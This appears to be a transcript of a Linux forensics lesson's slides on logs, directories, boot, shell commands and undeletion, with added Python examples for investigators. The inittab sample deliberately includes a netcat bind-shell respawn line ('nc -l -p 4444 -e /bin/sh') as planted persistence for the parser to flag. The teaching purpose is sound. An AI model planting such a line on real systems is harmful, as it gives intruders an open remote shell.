Forensic3e ppt ch09
- 1. © 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
System Forensics,
Investigation, and Response
Lesson 9
Linux Forensics
- 2. Page 2
Learning Objective
Understand the fundamentals of Linux.
Understand how to extricate data from a Linux
computer.
- 3. Page 3
Key Concepts
Linux file systems
What to look for in Linux system logs
Forensically interesting Linux directories
Important Linux shell commands
How to undelete files from Linux
- 4. Page 4
History of Linux
1969: UNIX created
1972: UNIX released
1983: GNU project announced
- 5. Page 5
History of Linux (Cont.)
1987: Minix
1991: Linux
2017: Hundreds of Linux distros
- 6. Page 6
Linux Shells
Bourne shell (sh)
Bourne-again shell (Bash)
C shell (csh)
Korn shell (ksh)
- 7. Page 7
Common Linux Shell Commands
- 8. Page 8
Common Linux Shell Commands
(Cont.)
- 9. Page 9
Common Linux Shell Commands
(Cont.)
- 10. Page 10
GNU Network Object Model Environment (GNOME)
Screenshot courtesy of The GNOME Project
- 11. Page 11
K Desktop Environment (KDE)/Plasma
Screenshot courtesy of KDE
- 12. Page 12
Other Linux GUIs
Common Desktop Environment (CDE)
• Originally developed in 1994 for UNIX
systems
• Based on HP’s Visual User Environment
(VUE)
Enlightenment
• Relatively new
• Designed for graphics developers
- 13. Page 13
Linux Boot Process
BIOS: runs the power-on self test (POST)
MBR: the firmware loads the boot loader (GRUB or LILO) from the master boot record
Kernel: switches the CPU from real mode to protected mode, then initializes devices
On UEFI firmware the boot loader is loaded from the EFI System Partition instead of the MBR; the remaining steps are the same
- 14. Page 14
Linux Boot Process (Cont.)
INIT: the kernel starts init as the first user-space process (PID 1)
Runlevels: init brings the system up to the configured runlevel
On current distributions systemd is PID 1 and uses targets (for example multi-user.target) in place of runlevels; systemctl get-default shows the configured one
- 15. Page 15
Run Levels
- 16. Page 16
Logical Volume Manager
An abstraction layer that provides volume
management for the Linux kernel
On a single system (like a single desktop or
server), primary role is to allow:
• The resizing of partitions
• The creation of backups by taking
snapshots of the logical volumes
- 17. Page 17
Linux Distributions
Open source operating system
Popular distributions:
• Ubuntu
• Red Hat Enterprise Linux (RHEL)
• OpenSUSE
• Fedora
• Debian
• Slackware
- 18. Page 18
Linux File Systems
Extended File System (ext)
• Current version is 4
ext4 supports volumes up to 1 exabyte and
single files up to 16 terabytes (with the default 4 KiB block size)
ext3 and ext4 support three journaling modes,
which trade write performance against how much file data survives a crash:
• journal (data and metadata are both journaled; safest, slowest)
• ordered (the default; only metadata is journaled, but data blocks are written before their metadata is committed)
• writeback (metadata only, with no ordering guarantee; fastest, least safe)
- 19. Page 19
Linux File Systems (Cont.)
Reiser File System
• Supports journaling
• Performs well when hard disk has large
number of smaller files
Berkeley Fast File System
• Also known as UNIX File System (UFS)
• Developed at UC-Berkeley for BSD UNIX, not
for Linux; Linux can mount UFS volumes read-only
• Uses a bitmap to track free blocks,
indicating availability
- 20. Page 20
Linux Logs
Log                  Contents
/var/log/faillog     Failed user logins (binary record; read it with the faillog command)
/var/log/kern.log    Messages from the operating system's kernel
/var/log/lpr.log     Items that have been printed
/var/log/mail.*      Email activity
/var/log/mysql.*     MySQL database server activity
- 21. Page 21
Linux Logs (Cont.)
Log                               Contents
/var/log/apache2/*                Apache web server activity
/var/log/lighttpd/*               Lighttpd web server activity
/var/log/apport.log               Application crashes
Intrusion detection system logs   Suspicious traffic
Also collect the authentication log (/var/log/auth.log on Debian/Ubuntu, /var/log/secure on Red Hat) and the binary login records wtmp and btmp, read with last and lastb
- 22. Page 22
Viewing Logs
Text editor in GUI
Any of these commands work from the
shell:
• # dmesg | less
• # tail -f /var/log/lpr.log
• # less /var/log/lpr.log
• # more -f /var/log/lpr.log
On systemd-based distributions many of these files are replaced by the binary journal; read it with journalctl (journalctl -k for kernel messages)
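An added example (not from the textbook) of reading kernel messages forensically: the "[uptime] message" text that dmesg shows is what rsyslog writes to /var/log/kern.log with a syslog prefix. The script parses constructed kern.log lines and rebuilds a USB device attach/detach timeline (vendor and product IDs, serial number, connect and disconnect times), and separately lists any user-space crashes the kernel logged. Host name, timestamps and device strings are invented for the example.

```python
import re

# Constructed sample in the format used by /var/log/kern.log (syslog prefix,
# then the kernel's own "[uptime] message" text). These lines were written for
# this example, not taken from a real host.
SAMPLE_KERN_LOG = """\
Mar 10 14:22:01 lab kernel: [ 3120.114532] usb 1-1: new high-speed USB device number 3 using xhci_hcd
Mar 10 14:22:01 lab kernel: [ 3120.265118] usb 1-1: New USB device found, idVendor=0781, idProduct=5583, bcdDevice= 1.00
Mar 10 14:22:01 lab kernel: [ 3120.265124] usb 1-1: Product: Ultra Fit
Mar 10 14:22:01 lab kernel: [ 3120.265126] usb 1-1: Manufacturer: SanDisk
Mar 10 14:22:01 lab kernel: [ 3120.265128] usb 1-1: SerialNumber: 4C530001234567890123
Mar 10 14:22:02 lab kernel: [ 3121.010331] sd 6:0:0:0: [sdb] Attached SCSI removable disk
Mar 10 14:30:15 lab kernel: [ 3614.772201] evil[2301]: segfault at 0 ip 00005632e1c4a1b0 sp 00007ffd0f0a2c40 error 4 in evil[5632e1c49000+2000]
Mar 10 14:39:47 lab kernel: [ 4186.552017] usb 1-1: USB disconnect, device number 3
"""

# Syslog prefix that rsyslog puts in front of every kernel message.
PREFIX_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) kernel: "
    r"\[\s*(?P<uptime>\d+\.\d+)\] (?P<msg>.*)$"
)
USB_RE = re.compile(r"^usb (?P<port>[\d.-]+): (?P<rest>.*)$")
NEW_RE = re.compile(r"^New USB device found, idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})")
ATTR_RE = re.compile(r"^(?P<key>Product|Manufacturer|SerialNumber): (?P<val>.*)$")


def parse_kernel_lines(text):
    """Yield (timestamp, host, uptime_seconds, message) for each well-formed line."""
    for line in text.splitlines():
        m = PREFIX_RE.match(line)
        if m:
            yield m["ts"], m["host"], float(m["uptime"]), m["msg"]


def usb_timeline(text):
    """One record per USB device attach: IDs, descriptor strings, connect/disconnect times."""
    devices = []
    open_by_port = {}   # bus port (e.g. "1-1") -> record of the device still attached there
    for ts, _host, _uptime, msg in parse_kernel_lines(text):
        u = USB_RE.match(msg)
        if not u:
            continue
        port, rest = u["port"], u["rest"]
        n = NEW_RE.match(rest)
        a = ATTR_RE.match(rest)
        if n:
            rec = {"port": port, "connected": ts, "disconnected": None,
                   "idVendor": n["vid"], "idProduct": n["pid"],
                   "Product": None, "Manufacturer": None, "SerialNumber": None}
            devices.append(rec)
            open_by_port[port] = rec
        elif a and port in open_by_port:
            open_by_port[port][a["key"]] = a["val"]
        elif rest.startswith("USB disconnect") and port in open_by_port:
            open_by_port.pop(port)["disconnected"] = ts
    return devices


def crash_events(text):
    """(timestamp, message) for user-space crashes the kernel reported."""
    return [(ts, msg) for ts, _h, _u, msg in parse_kernel_lines(text) if "segfault at" in msg]


if __name__ == "__main__":
    # On a real case: text = open("/var/log/kern.log").read()
    for d in usb_timeline(SAMPLE_KERN_LOG):
        print(f"{d['connected']} -> {d['disconnected'] or 'still attached'}: "
              f"{d['Manufacturer']} {d['Product']} ({d['idVendor']}:{d['idProduct']}) "
              f"serial {d['SerialNumber']}")
    for ts, msg in crash_events(SAMPLE_KERN_LOG):
        print(ts, msg)
```

On a systemd host with no kern.log, feed it the output of journalctl -k -o short, which uses the same syslog-style prefix. The dmesg ring buffer is small and is lost at reboot, so the persisted log (or the journal) is the copy to collect.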
- 23. Page 23
Linux Directories
Key directories are important to the
functioning of every operating system
Directories are also important places to
seek out evidence in an investigation
- 24. Page 24
/root
Home directory for the root user
• Contains data for the administrator
Linux root user is equivalent to Windows
Administrator
- 25. Page 25
The /bin Directory
- 26. Page 26
/sbin
Similar to /bin
Contains system-administration binaries (for
example fsck, ifconfig) not intended for the
average computer user
- 27. Page 27
/etc
Contains configuration files, such as for
web servers, boot loaders, security
software, and many other applications
- 28. Page 28
/etc/inittab File
Sets boot-up process and operation under SysV init
• Example: init level for the system on start-up
Each line has four colon-separated fields:
label:run_level:action:process
Common action values: boot, bootwait, initdefault, sysinit, and respawn (restart the process whenever it exits)
systemd does not read /etc/inittab; on those systems look at the unit files under /etc/systemd/system instead
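An added example (not from the textbook) that parses a SysV /etc/inittab into its four fields, reports the default runlevel and the processes init would start when entering it, and flags respawn entries that fall outside an assumed baseline. The inittab content, including the planted netcat listener, is constructed for the example; the list of expected respawn programs is an assumption to tune for the distribution under review.

```python
# Constructed SysV-style /etc/inittab for this example (not from a real host).
# The last entry is a deliberately planted persistence mechanism.
SAMPLE_INITTAB = """\
# Default runlevel (SysV init reads this file; systemd does not).
id:3:initdefault:
si::sysinit:/etc/rc.d/rc.sysinit
l0:0:wait:/etc/rc.d/rc 0
l3:3:wait:/etc/rc.d/rc 3
l5:5:wait:/etc/rc.d/rc 5
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
x:5:respawn:/etc/X11/prefdm -nodaemon
zz:2345:respawn:/bin/sh -c '/usr/bin/nc -l -p 4444 -e /bin/sh'
"""

# Programs that legitimately appear in respawn entries on a typical SysV host.
# Assumed baseline for this example; adjust it to the distribution being examined.
EXPECTED_RESPAWN_PREFIXES = ("/sbin/mingetty", "/sbin/agetty", "/sbin/getty", "/etc/X11/prefdm")

# Actions that start a process during boot or on entering a runlevel.
STARTING_ACTIONS = ("sysinit", "boot", "bootwait", "wait", "once", "respawn")


def parse_inittab(text):
    """Parse id:runlevels:action:process lines into dicts, skipping comments and blanks."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":", 3)        # process field may itself contain ':'
        if len(parts) < 3:
            continue                        # malformed line; init would reject it too
        while len(parts) < 4:
            parts.append("")
        ident, runlevels, action, process = parts
        entries.append({"id": ident, "runlevels": runlevels,
                        "action": action, "process": process.strip()})
    return entries


def default_runlevel(entries):
    """Runlevel named by the initdefault entry, or None if there is none."""
    for e in entries:
        if e["action"] == "initdefault":
            return e["runlevels"]
    return None


def applies_to(entry, runlevel):
    """An empty runlevels field means the entry applies regardless of runlevel."""
    return not entry["runlevels"] or runlevel in entry["runlevels"]


def processes_at_boot(entries, runlevel=None):
    """Entries whose process init starts when entering the given (or default) runlevel."""
    rl = runlevel or default_runlevel(entries)
    return [e for e in entries
            if e["action"] in STARTING_ACTIONS and e["process"] and applies_to(e, rl)]


def unexpected_respawns(entries):
    """respawn entries whose program is not in the baseline: review these first."""
    return [e for e in entries if e["action"] == "respawn"
            and not e["process"].startswith(EXPECTED_RESPAWN_PREFIXES)]


if __name__ == "__main__":
    ents = parse_inittab(SAMPLE_INITTAB)   # real case: open("/etc/inittab").read()
    print("default runlevel:", default_runlevel(ents))
    for e in processes_at_boot(ents):
        print(f"  {e['id']:>3} [{e['action']}] {e['process']}")
    for e in unexpected_respawns(ents):
        print("REVIEW:", e["id"], e["process"])
```

A respawn entry is attractive to an intruder precisely because init restarts the process if it is killed; that is why the check looks at the program path of every respawn line rather than only at the default runlevel.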
- 29. Page 29
/dev
Contains device files
• Interfaces to devices
All devices should have a device file in /dev
Device naming conventions:
• hd = legacy IDE hard drive (/dev/hda, /dev/hdb, ...)
• sd = SCSI, SATA, or USB disk (/dev/sda, /dev/sdb, ...); a partition adds a number, e.g. /dev/sda1
• fd = floppy drive (/dev/fd0)
• cd = CD/DVD (/dev/cdrom, usually a symlink to /dev/sr0)
• Example: the main hard drive is typically /dev/sda, or /dev/hda on an old IDE system
- 30. Page 30
/mnt
Traditional mount point for file systems mounted by hand; desktop distributions put removable media under /media
Drives must be mounted prior to use
Listing /mnt shows mount points, not what is mounted; run mount, findmnt, or read /proc/mounts to see what is currently mounted and whether it is read-only
- 31. Page 31
/boot
Contains files critical for booting
Boot loader (LILO or GRUB) looks in this
directory
Kernel images commonly located in /boot
- 32. Page 32
/usr
Contains user-space programs and their support files (/usr/bin, /usr/sbin, /usr/lib, /usr/share)
Individual users' home directories live under /home, not /usr
- 33. Page 33
/var and /var/spool
/var
• Contains data that is changed during
system operation (logs, caches, spool files)
/var/spool
• Contains queued work, including the print queue and the mail and cron spools
- 34. Page 34
The /proc Directory
- 35. Page 35
Shell Commands for Forensics
Linux has hundreds of shell commands
Some can be very useful in forensic
investigations
- 36. Page 36
The dmesg Command
- 37. Page 37
The pstree Command
- 38. Page 38
The file Command
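An added example (not the textbook's code, and not libmagic, which is what the real file command uses): a minimal version of the check that file performs, comparing a file's leading bytes against a short signature table and reporting files whose extension disagrees with their content, the case the quiz later describes. The signature table covers only a handful of types and the sample files are constructed byte strings.

```python
# Magic-number table (leading bytes -> type), a small subset of what libmagic
# knows. The extension sets are the names normally used for each type.
SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "PNG image", {"png"}),
    (b"\xff\xd8\xff", "JPEG image", {"jpg", "jpeg"}),
    (b"%PDF-", "PDF document", {"pdf"}),
    (b"PK\x03\x04", "ZIP archive", {"zip", "docx", "xlsx", "pptx", "jar", "apk", "odt"}),
    (b"\x7fELF", "ELF executable", {"", "so", "elf"}),
    (b"MZ", "DOS/Windows executable", {"exe", "dll", "sys"}),
    (b"\x1f\x8b", "gzip compressed data", {"gz", "tgz"}),
    (b"#!", "script text", {"", "sh", "py", "pl"}),
]

# Constructed sample "files": name -> contents. Only the headers matter here.
SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
    "notes.txt": b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 56,     # ELF binary renamed as text
    "invoice.pdf.exe": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",          # name says exe, bytes say PDF
    "resume.docx": b"PK\x03\x04\x14\x00\x06\x00" + b"\x00" * 24,
    "README": b"Plain text with no signature\n",
}


def identify(data):
    """(type name, expected extensions) from leading bytes; ('data', None) if unknown."""
    for magic, name, exts in SIGNATURES:
        if data[:len(magic)] == magic:
            return name, exts
    return "data", None


def extension_of(filename):
    """Lower-cased final extension, '' when there is none."""
    base = filename.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def extension_mismatch(filename, data):
    """(type, mismatch): True/False when the type is known, None when it is not."""
    name, exts = identify(data)
    if exts is None:
        return name, None
    return name, extension_of(filename) not in exts


def scan(files):
    """Run the check over a {name: bytes} mapping; mismatches sort first."""
    rows = [(name,) + extension_mismatch(name, data) for name, data in files.items()]
    return sorted(rows, key=lambda r: (r[2] is not True, r[0]))


if __name__ == "__main__":
    # Real case: files = {p: open(p, "rb").read(64) for p in paths}
    for name, kind, mismatch in scan(SAMPLES):
        flag = {True: "MISMATCH", False: "ok", None: "unknown"}[mismatch]
        print(f"{flag:8} {name:18} {kind}")
```

Reading only the first 64 bytes is enough for this table; the real file command also examines text encoding and many offset-based signatures, so treat this as a triage filter, and run file itself on anything it flags.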
- 39. Page 39
Undeleting Linux Files: Manually
Move system to single-user mode (fewer processes writing, so freed blocks are less likely to be reused); better still, image the partition with dd and search the copy
Use grep or similar command; -a treats the raw device as text and -b prints the byte offset of each match
Example: grep -a -b 'search-text' /dev/partition > file.txt
Write file.txt to a different file system than the one being searched, or the output itself may overwrite the blocks being recovered
Use command-line editor to view file
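An added example (not from the textbook) of the grep -b approach applied to an image rather than a live device: it searches a constructed 32 KiB "partition image" for a string, reports the byte offset and block number the way grep -a -b would, then carves the surrounding text and the whole block that holds it. The block size and the image contents are assumptions made for the example; on a real case the image would come from dd.

```python
import re

BLOCK_SIZE = 4096   # assumed file system block size for the constructed image


def build_sample_image():
    """Constructed 8-block 'partition image': a deleted file's data still sits in block 5."""
    img = bytearray(BLOCK_SIZE * 8)                     # zero-filled, like unused space
    # Block 1 holds an unrelated, still-live text file.
    live = b"shopping list\nmilk\neggs\n"
    img[BLOCK_SIZE * 1:BLOCK_SIZE * 1 + len(live)] = live
    # Block 5: contents of a file whose directory entry was removed (simulated rm).
    deleted = b"CONFIDENTIAL: wire transfer to account 99-1234 scheduled 2019-03-12\n"
    start = BLOCK_SIZE * 5 + 17
    img[start:start + len(deleted)] = deleted
    return bytes(img)


def search_image(image, needle):
    """Every match of needle with its byte offset and block number (what grep -a -b reports)."""
    return [{"offset": m.start(), "block": m.start() // BLOCK_SIZE}
            for m in re.finditer(re.escape(needle), image)]


def carve_text(image, offset):
    """Extend a hit backwards and forwards to the nearest NUL or newline."""
    start = offset
    while start > 0 and image[start - 1] not in (0x00, 0x0A):
        start -= 1
    end = offset
    while end < len(image) and image[end] not in (0x00, 0x0A):
        end += 1
    return image[start:end]


def carve_block(image, block):
    """The raw block holding a hit: the unit to save to another device for analysis."""
    return image[block * BLOCK_SIZE:(block + 1) * BLOCK_SIZE]


if __name__ == "__main__":
    image = build_sample_image()   # real case: open("/mnt/evidence/sdb1.dd", "rb").read()
    for hit in search_image(image, b"wire transfer"):
        text = carve_text(image, hit["offset"]).decode("ascii", "replace")
        print(f"offset {hit['offset']} (block {hit['block']}): {text}")
```

The block number is the value to carry over to a file-system tool such as Sleuth Kit's blkcat, which can dump that block from the image; for images larger than memory, map the file with mmap instead of read().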
- 40. Page 40
Let’s Play:
Identify the Shell Command
- 41. Page 41
Command 1
Displays the commands that have
previously been entered
Answer choices:
a. dmesg
b. grep
c. history
d. ls
- 42. Page 42
Answer 1
history
- 43. Page 43
Command 2
Shows all the processes in the form of a
tree structure
Answer choices:
a. ps
b. pstree
c. ls
d. top
- 44. Page 44
Answer 2
pstree
- 45. Page 45
Command 3
Takes the name you provide and returns
the ID for that process; can work with
partial names
Answer choices:
a. pgrep
b. dd
c. grep
d. file
- 46. Page 46
Answer 3
pgrep
- 47. Page 47
Command 4
Lists the processes in the order of how
much CPU time the process is utilizing
Answer choices:
a. ps
b. ls
c. su
d. top
- 48. Page 48
Answer 4
top
- 49. Page 49
Command 5
A criminal changes a file extension. This
command can identify the file.
Answer choices:
a. history
b. ls
c. file
d. mount
- 50. Page 50
Answer 5
file
- 51. Page 51
Command 6
Sends a signal (SIGTERM by default) to stop a
running process based on the process ID (PID) you provide
Answer choices:
a. kill
b. dmesg
c. ps
d. finger
- 52. Page 52
Answer 6
kill
- 53. Page 53
Command 7
Invokes the super user mode
Answer choices:
a. who
b. grep
c. finger
d. su
- 54. Page 54
Answer 7
su
- 55. Page 55
Command 8
Provides information about a specific user
Answer choices:
a. finger
b. who
c. su
d. grep
- 56. Page 56
Answer 8
finger
- 57. Page 57
Kali Linux
Has a number of forensics tools
Can use as quality control tool to
complement OSForensics, FTK, or Encase
Includes Autopsy, a web-based graphical
user interface for the command-line tool
Sleuth Kit
- 58. Page 58
Autopsy
- 59. Page 59
Autopsy (Cont.)
- 60. Page 60
Autopsy (Cont.)
- 61. Page 61
Autopsy (Cont.)
- 62. Page 62
Summary
Linux file systems
What to look for in Linux system logs
Forensically interesting Linux directories
Important Linux shell commands
How to undelete files from Linux